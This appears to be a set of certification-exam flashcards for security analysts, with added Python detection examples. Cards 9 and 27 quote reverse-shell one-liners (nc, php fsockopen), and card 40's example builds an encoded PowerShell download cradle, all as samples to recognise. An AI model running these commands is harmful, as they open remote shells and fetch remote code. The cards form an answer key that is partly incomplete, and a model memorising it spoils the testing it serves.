Chapter 2 Flashcards

(71 cards)

1
Q

The chief information security officer wants to eliminate or reduce shadow IT in the enterprise. Several high-risk cloud applications are in use, increasing the risk to the organization. Which of the following solutions will assist in reducing the risk?

A
2
Q

An end-of-life date was announced for a widely used OS. A business-critical function is performed by machinery that is controlled by a PC running the OS that is approaching its end-of-life date. Which of the following best describes a security analyst's concern?

A

Any discovered vulnerabilities will not be remediated

3
Q

A security analyst needs to block vulnerable ports and disable legacy protocols. The analyst has ensured that NetBIOS, Trio, Telnet, SMB and TFTP are blocked and/or disabled. Which of the following additional protocols should the analyst block next?

A

SNMP version 1 (community strings are sent in cleartext and there is no authentication; SNMPv3 adds both)

4
Q

During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a WAF. Which of the following best represents the change to the overall risk associated with the vulnerability?

A

The risk would increase because the host is external facing. A WAF inspects HTTP traffic and does nothing for an RDP exposure on TCP/3389, so the compensating control does not apply to this finding.

5
Q

An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed from a secure template. Which of the following is the best resource to ensure a secure configuration?

A

CIS benchmarks

6
Q

A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?

A

Forensic analysis

7
Q

A payroll department employee was the target of a phishing attack in which the attacker impersonated the department director and requested that direct deposit information be updated to a new account. After a deposit was made to the unauthorized account, which of the following is the first action the incident response team should take when they receive notification of the attack?

A

Review the actions already taken by the employee and the email related to the event

8
Q

A penetration tester submitted data to a form in a web application, which enabled the tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?

A

Perform input validation before allowing submission. (For an injection flaw that returns stored credentials, parameterized queries are the primary fix; input validation is the defense-in-depth layer the exam is asking for.)

9
Q

A security analyst detected the following suspicious activity. Which of the following most likely describes the activity?

rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

A

Reverse shell. The named pipe /tmp/f carries whatever nc receives from 10.0.0.1:1234 into an interactive /bin/sh, and the shell's output (stdout and stderr) goes back out through nc, so the remote host gets a shell on the victim.

10
Q

An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The emails contain a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening?

A

Social engineering attack
Obfuscated links

11
Q

The web-facing application team notifies a SOC analyst that there are thousands of HTTP 404 events on the public-facing web server. Which of the following is the next step for the analyst to take?

A

Identify the IP/hostname of the requester and look at the related activity

12
Q

A security analyst needs to provide evidence of regular vulnerability scanning on the company's network for an auditing process. Which of the following is an example of a tool that can produce such evidence?

A

OpenVAS

13
Q

A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnet to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?

A

Registry key values. A network-only (uncredentialed) scan sees open ports and service banners; host-internal data such as registry keys and installed package versions requires a credentialed scan or an agent.

14
Q

Which of the following is a nation-state actor least likely to be concerned with?

A

Forensic analysis for legal actions taken

15
Q

A system administrator needs to gather security events with repeatable patterns from Linux log files. Which of the following would the administrator most likely use for this task?

A

A regular expression in bash

16
Q

A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst should properly document the incident?

A

Take photos of the impacted items

17
Q

A user is suspected of violating policy by logging into a Linux VM during non-business hours. Which of the following system files is the best way to track the user's activities?

A

/var/log/secure (RHEL-family systems; Debian and Ubuntu write the same sshd and sudo events to /var/log/auth.log)
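Cards 15 and 17 together describe the task: pull repeatable patterns out of the Linux authentication log and use them to reconstruct what a user did outside business hours. The following is an added example (not part of the original flashcards) that does this in Python rather than a bash one-liner so the parsed fields can be reused. The log lines are constructed for the example in the RHEL /var/log/secure syslog format; the host name, users, addresses and the 08:00-18:00 business window are all assumptions.

```python
import re
from collections import Counter

# Constructed sample of /var/log/secure (RHEL-family syslog format: no year,
# no time zone). These lines are made up for the example, not from a real host.
SAMPLE_SECURE_LOG = """\
Mar  3 02:14:07 vm01 sshd[1201]: Accepted publickey for jdoe from 10.0.0.5 port 51234 ssh2: RSA SHA256:q1w2e3
Mar  3 02:15:42 vm01 sudo:     jdoe : TTY=pts/0 ; PWD=/home/jdoe ; USER=root ; COMMAND=/bin/tar czf /tmp/db.tgz /var/lib/pgsql
Mar  3 09:30:11 vm01 sshd[1310]: Accepted password for asmith from 10.0.0.7 port 51300 ssh2
Mar  3 11:02:55 vm01 sshd[1402]: Failed password for invalid user admin from 203.0.113.9 port 40022 ssh2
Mar  3 11:02:58 vm01 sshd[1402]: Failed password for invalid user admin from 203.0.113.9 port 40022 ssh2
Mar  3 22:47:19 vm01 sshd[1550]: Accepted password for jdoe from 10.0.0.5 port 51901 ssh2
"""

# One pattern covers sshd Accepted/Failed lines. The optional "invalid user "
# prefix appears on failures for accounts that do not exist.
SSH_AUTH_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\S+) "
    r"for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

# sudo records the invoking user and the exact command that was run.
SUDO_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"\S+ sudo:\s+(?P<user>\S+) : .*COMMAND=(?P<cmd>.+)$"
)


def parse_ssh_auth(log_text):
    """Return one dict per sshd Accepted/Failed line; other lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = SSH_AUTH_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def after_hours_logins(log_text, start_hour=8, end_hour=18):
    """Successful logins whose hour-of-day falls outside [start_hour, end_hour).

    The syslog timestamp carries no zone, so this assumes the host's local
    time; confirm the VM's configured zone before drawing conclusions.
    """
    hits = []
    for ev in parse_ssh_auth(log_text):
        hour = int(ev["time"][:2])
        if ev["result"] == "Accepted" and not (start_hour <= hour < end_hour):
            hits.append((ev["user"], ev["src"], f'{ev["mon"]} {ev["day"]} {ev["time"]}'))
    return hits


def failed_by_source(log_text):
    """Count failed authentications per source address (brute-force triage)."""
    return Counter(ev["src"] for ev in parse_ssh_auth(log_text) if ev["result"] == "Failed")


def sudo_commands(log_text, user=None):
    """Commands run through sudo, optionally limited to one user."""
    cmds = []
    for line in log_text.splitlines():
        m = SUDO_RE.match(line)
        if m and (user is None or m["user"] == user):
            cmds.append((m["user"], m["time"], m["cmd"]))
    return cmds


if __name__ == "__main__":
    for user, src, when in after_hours_logins(SAMPLE_SECURE_LOG):
        print(f"after-hours login: {user} from {src} at {when}")
    print("failed attempts by source:", dict(failed_by_source(SAMPLE_SECURE_LOG)))
    print("sudo by jdoe:", sudo_commands(SAMPLE_SECURE_LOG, "jdoe"))
```

On the sample data the 02:14 and 22:47 logins by jdoe are flagged, and the sudo record shows what was done in the off-hours session (an archive of the database directory written to /tmp), which is the kind of detail an HR case needs beyond the bare login time.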

18
Q

A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relative impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS 3.1 base scores?

A

AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L (listed on the card with a base score of 6.5; the CVSS 3.1 base formula actually gives 3.9 for this vector, but it is still the lowest of the options either way)

19
Q

A security analyst can review the Windows registry on endpoints to gain insight into which of the following?

A

System-critical configuration items

20
Q

A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a block-listed external server. Which of the following best describes the activity that is taking place?

A

Beaconing
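What makes the card's traffic "beaconing" rather than ordinary browsing is the regularity of the interval, not the volume. The following is an added example (not part of the original flashcards) that takes a SIEM-style export of proxy/firewall records, groups them by source, destination and port, and flags pairs whose inter-request gaps have a low coefficient of variation. The records, the 10.0.0.0/8 hosts, the external addresses and the block list are all constructed for the example; the thresholds (at least 6 events, CV at most 0.15) are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed SIEM export: "<ISO-8601 UTC timestamp> <src ip> <dst ip> <dst port>".
# 10.0.0.25 calls 198.51.100.40 every ~300 s (jitter of a few seconds);
# 10.0.0.31 browses 93.184.216.34 at human, irregular intervals.
SAMPLE_SIEM_EXPORT = """\
2024-03-03T10:00:00Z 10.0.0.25 198.51.100.40 443
2024-03-03T10:00:12Z 10.0.0.31 93.184.216.34 443
2024-03-03T10:00:24Z 10.0.0.31 93.184.216.34 443
2024-03-03T10:05:00Z 10.0.0.25 198.51.100.40 443
2024-03-03T10:06:04Z 10.0.0.31 93.184.216.34 443
2024-03-03T10:07:19Z 10.0.0.31 93.184.216.34 443
2024-03-03T10:09:59Z 10.0.0.25 198.51.100.40 443
2024-03-03T10:15:01Z 10.0.0.25 198.51.100.40 443
2024-03-03T10:19:59Z 10.0.0.25 198.51.100.40 443
2024-03-03T10:25:00Z 10.0.0.25 198.51.100.40 443
2024-03-03T10:30:00Z 10.0.0.25 198.51.100.40 443
2024-03-03T10:32:19Z 10.0.0.31 93.184.216.34 443
2024-03-03T10:32:23Z 10.0.0.31 93.184.216.34 443
2024-03-03T10:34:59Z 10.0.0.25 198.51.100.40 443
2024-03-03T10:40:01Z 10.0.0.25 198.51.100.40 443
2024-03-03T10:45:01Z 10.0.0.25 198.51.100.40 443
2024-03-03T10:47:23Z 10.0.0.31 93.184.216.34 443
2024-03-03T10:50:00Z 10.0.0.31 203.0.113.77 443
"""

# Constructed block list standing in for the card's "block-listed external server".
BLOCK_LIST = {"198.51.100.40"}


def parse_export(text):
    """Group timestamps by (src, dst, port)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst, port = line.split()
        flows[(src, dst, int(port))].append(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"))
    return flows


def find_beacons(text, min_events=6, max_cv=0.15):
    """Return flows whose request spacing is too regular to be a person.

    CV = stdev(gaps) / mean(gaps). A C2 beacon with a fixed sleep (even with
    modest jitter) has CV near 0; interactive browsing is well above 1.
    Flows with fewer than min_events records are skipped: two or three hits
    cannot establish a period.
    """
    results = []
    for (src, dst, port), stamps in parse_export(text).items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        period = mean(gaps)
        cv = pstdev(gaps) / period if period > 0 else float("inf")
        if cv <= max_cv:
            results.append({
                "src": src,
                "dst": dst,
                "port": port,
                "events": len(stamps),
                "period_s": round(period, 1),
                "cv": round(cv, 4),
                "on_blocklist": dst in BLOCK_LIST,
            })
    return sorted(results, key=lambda r: r["cv"])


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_SIEM_EXPORT):
        print(hit)
```

The block-list match on its own is the alert the card describes; the period and CV tell the analyst how long the implant has been checking in and what sleep interval to search for on other hosts.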

21
Q

While reviewing web server logs, an analyst notices several entries with the same timestamps that all contain odd characters in the request line. Which of the following steps should be taken next?

A

Determine what attack the odd characters are indicative of

22
Q

A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URLs that should be denied access prior to more in-depth scanning. Which of the following best fits the type of scanning activity requested?

A

Discovery scan

23
Q

A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MITRE repositories would be best to review?

A

Common Vulnerabilities and Exposures (CVE)

24
Q

A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?

A

Registry

25
Q

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files reflecting the web searches from the user's workstation to build a case for the investigation. Which of the following is the best way to ensure the investigation complies with HR or privacy policies?

A

Ensure that the case details do not reflect any user-identifiable information; password-protect the evidence and restrict access to personnel involved in the investigation.

26
Q

A user reports a message as suspicious to the IT security team. An analyst reviews the message and notices that the following text becomes a hyperlink in the email. Which of the following would most likely explain this behavior?

%77%77%77%2e%63%6f%6d%70%74%69%61%2e%63%6f%6d

A

The text is percent (URL) encoded and designed to bypass spam filters. Each %XX pair is one ASCII byte; the string decodes to www.comptia.com, which the mail client renders as a link.

27
Q

While reviewing web server logs, a security analyst discovers the following suspicious line. Which of the following is being attempted?

php -r '$socket=fsockopen("10.0.0.1",1234);passthru("/bin/sh -i <&3 >&3 2>&3");'

A

Reverse shell. The socket opened to 10.0.0.1:1234 becomes file descriptor 3 in the php process, and the shell's stdin, stdout and stderr are all redirected to it.

28
Q

During the rollout of a patch to the production environment, it was discovered that required connections to remote systems were no longer possible. Which of the following steps would most likely have revealed this gap?

A

User acceptance testing

29
Q

An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed?

A

CSRF

30
Q

A security analyst provides the management team with an after-action report for a security incident. Which of the following is the management team most likely to review in order to correct validated issues with the incident response process?

A

Lessons learned

31
Q

An analyst reviews the following endpoint log entry:

Invoke-Command -ComputerName ClientComputer1 -Credential XYZCompany\Administrator -ScriptBlock { ... }

A

A new account was introduced

32
Q

An e-commerce organization recently experienced a cyberattack. During the lessons-learned meeting, a cybersecurity analyst requests that the RTO be prioritized. Which of the following is the greatest concern?

A

Availability

33
Q

A SOC analyst observes reconnaissance activity from an IP address. The activity follows a pattern of short bursts toward a low number of targets, and an open-source review shows that the IP has a bad reputation. The perimeter firewall logs indicate that the inbound traffic was allowed. The destination hosts are high-value assets with EDR agents installed. Which of the following is the best action for the SOC to take to protect against any further activity from the source IP?

A

Create a SIEM signature to trigger on any activity from the source IP subnet detected by the web proxy or firewall, for immediate notification.

34
Q

Which of the following should be updated after a lessons-learned review?

A

Incident response plan

35
Q

A recent audit of the vulnerability management program outlined a finding for increased awareness of secure coding practices. Which of the following would best address the finding?

A

Establish quarterly SDLC training on the top vulnerabilities for developers

36
Q

A cybersecurity analyst is doing triage in a SIEM and notices that the timestamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the timestamps?

A

The NTP server is not configured on the host. A 43-minute offset is not a time-zone difference (those are whole or half hours), so the host's clock has drifted without synchronization.

37
Q

Which of the following are process improvements that can be realized by implementing a SOAR solution?

A

Reduced repetitive tasks; generated reports and metrics

38
Q

Joe, a leading salesperson at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is listing his current employer's customers; however, he has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?

A

Recommend no action until HR or legal counsel advises on next steps

39
Q

When undertaking a cloud migration of multiple SaaS applications, an organization's systems administrators struggled with the complexity of extending identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?

A

OpenID

40
Q

An analyst is investigating a phishing incident and has retrieved the following as part of the investigation. Which of the following should the analyst use to gather more information about the purpose of this command?

cmd.exe /c c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy bypass -NoLogo -NoProfile -EncodedCommand

A

Echo the command payload content into 'base64 -d'. Note that -EncodedCommand takes Base64 of UTF-16LE text, so the output of base64 -d contains a NUL byte after every character; pipe it through iconv -f UTF-16LE (or decode it as Unicode in PowerShell) to read the script.
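Cards 26 and 40 are both "decode what the attacker obfuscated" questions, and the second one has a trap: base64 -d on an -EncodedCommand payload yields UTF-16LE bytes, which look like garbage with embedded NULs until they are decoded as such. The following is an added example (not from the original flashcards) that handles both artifacts in one place: percent-decoding the card's link text, pulling the -EncodedCommand argument out of a command line, and decoding it as UTF-16LE. The card's command line is truncated after -EncodedCommand, so the PowerShell payload here is constructed for the example (it downloads from the reserved name example.invalid and is not a real stager); the parameter-abbreviation regex is an assumption covering the short forms commonly seen in the wild.

```python
import base64
import re
from urllib.parse import unquote

# Percent-encoded text from card 26; it renders as a clickable hostname.
ENCODED_LINK = "%77%77%77%2e%63%6f%6d%70%74%69%61%2e%63%6f%6d"

# Constructed stand-in for the payload the card's command line would carry.
# example.invalid is a reserved name; nothing here reaches the network.
DEMO_SCRIPT = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage.ps1")'

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; -e/-ec/-enc
# are the forms seen most often in phishing payloads (assumed set).
ENC_ARG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_percent_text(text):
    """Turn %XX sequences back into characters (card 26)."""
    return unquote(text)


def encode_powershell_command(script):
    """What an attacker runs to build the argument: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(b64):
    """Inverse of the above. Decoding as UTF-16LE is the step 'base64 -d' lacks."""
    return base64.b64decode(b64).decode("utf-16-le")


def looks_like_utf16(b64):
    """True when the raw bytes carry the NUL-every-other-byte pattern of UTF-16LE ASCII."""
    raw = base64.b64decode(b64)
    return len(raw) >= 2 and raw[1::2].count(0) == len(raw[1::2])


def extract_encoded_command(cmdline):
    """Return the Base64 argument following -EncodedCommand (or a short form), if any."""
    m = ENC_ARG_RE.search(cmdline)
    return m.group(1) if m else None


def build_demo_cmdline():
    """The card's command line with the constructed payload appended."""
    return (
        "cmd.exe /c c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "
        "-WindowStyle hidden -ExecutionPolicy bypass -NoLogo -NoProfile "
        "-EncodedCommand " + encode_powershell_command(DEMO_SCRIPT)
    )


def decode_cmdline(cmdline):
    """One call for triage: find the encoded argument and return the script text."""
    arg = extract_encoded_command(cmdline)
    return decode_powershell_command(arg) if arg else None


if __name__ == "__main__":
    print("link text decodes to:", decode_percent_text(ENCODED_LINK))
    cmd = build_demo_cmdline()
    print("encoded argument is UTF-16LE:", looks_like_utf16(extract_encoded_command(cmd)))
    print("decoded script:", decode_cmdline(cmd))
```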
41
Q

An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users at multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a denial-of-service attack. Which of the following should the team review first?

A

DNS

42
Q

A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?

A

Passive scanning

43
Q

A security analyst at a company called ACME Commercial notices outbound traffic to a host IP that resolves to https://office365password.acme.ca. The site's standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?

A

A social engineering attack is underway

44
Q

A SOC team lead occasionally collects DNS information for investigations. The team lead assigned this task to a new junior analyst. Which of the following is the best way to relay the process information to the junior analyst?

A

Write a step-by-step document on the team wiki outlining the process

45
Q

A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?

A

Implement segmentation with ACLs

46
Q

A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a freeze window and has decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does the scenario illustrate?

A

Business process interruption

47
Q

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

A

A threshold value

48
Q

A cybersecurity analyst has been assigned to the threat-hunting team to create a dynamic detection strategy based on behavioral analysis and attack patterns. Which of the following best describes what the analyst will be creating?

A

TTPs

49
Q

A recent vulnerability scan resulted in an enormously large number of critical and high findings that require patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?

A

Integrate an IT service delivery ticketing system to track remediation and closure

50
Q

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?

A

Impact

51
Q

A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?

A

Determine the asset value of each system

52
Q

A third-party assessment of a recent incident determined that the incident response team spent too long trying to get the scope needed for the incident timeline, and that too much time was spent searching for false positives. Which of the following should the team work on first?

A

Detection tuning

53
Q

A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of the following would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly?

A

Hostname and CVE details

54
Q

Several reports have been received of sensitive information being disclosed via file-sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

A

Improve employee training and awareness

55
Q

Several incidents have occurred with a legacy web application that has had little development work completed. Which of the following is the most likely cause of the incidents?

A

Outdated libraries

56
Q

A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality?

A

Data masking

57
Q

Which of the following can be used to learn more about TTPs used by cybercriminals?

A

MITRE ATT&CK

58
Q

An organization recently changed its BC and DR plans. Which of the following would best allow the incident response team to test the changes without any impact to the business?

A

Perform a tabletop drill based on previously identified incident scenarios

59
Q

A corporation wants to implement an agent-based endpoint solution to help flag various threats, review vulnerability feeds, aggregate data, and provide real-time metrics by using scripting languages. Which of the following tools should the corporation implement to reach this goal?

A

SOAR

60
Q

An organization's threat intelligence team notes a recent trend in adversary privilege-escalation procedures: multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be the most effective to reduce the rate of success of such attempts?

A

Harden systems by disabling or removing unnecessary services

61
Q

While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the following controls is most likely preventing the analyst from finding the proper memory address of a piece of malicious code?

A

Address space layout randomization (ASLR)

62
Q

An organization has a critical financial application hosted online that does not allow event logging to be sent to the corporate SIEM. Which of the following is the best option for the security analyst to configure to improve the efficiency of security operations?

A

Use a vendor-provided API to automate pulling the logs in real time

63
Q

A security analyst discovered an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?

A

Search for other mail users who have received the same file

64
Q

The cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement a host-based IPS, a firewall, and two-factor authentication. Which of the following does this most likely describe?

A

System hardening

65
Q

An analyst is creating the final vulnerability report for one of the company's customers. The customer asks for a scanning profile with a CVSS score of 7 or higher. The analyst confirms that there is no finding for missing database patches, even though false positives have been eliminated by manual checks. Which of the following is the most probable reason for the missing scan result?

A

The server was offline at the moment of the scan

66
Q

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort helps to achieve?

A

False positive rates dropped to 20%

67
Q

Which of the following defines the proper sequence of data volatility regarding the evidence collection process, from most to least volatile?

A

Cache, routing table, physical memory, temporary partition, hard disk, physical configuration

68
Q

A security analyst observes a high volume of SYN flags from an unexpected source toward a web application server within one hour. The traffic is not flagging any exploit signatures. Which of the following best describes this activity?

A

An attacker is executing reconnaissance activities by mapping which ports are open and closed

69
Q

Which of the following best describes a document that defines an expectation to network customers that patching will only occur between 2 AM and 4 AM?

A

SLA

70
Q

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

A

DLP

71
Q

An analyst wants to detect outdated software packages on a server. Which of the following methodologies will achieve this objective?

A

Credentialed scanning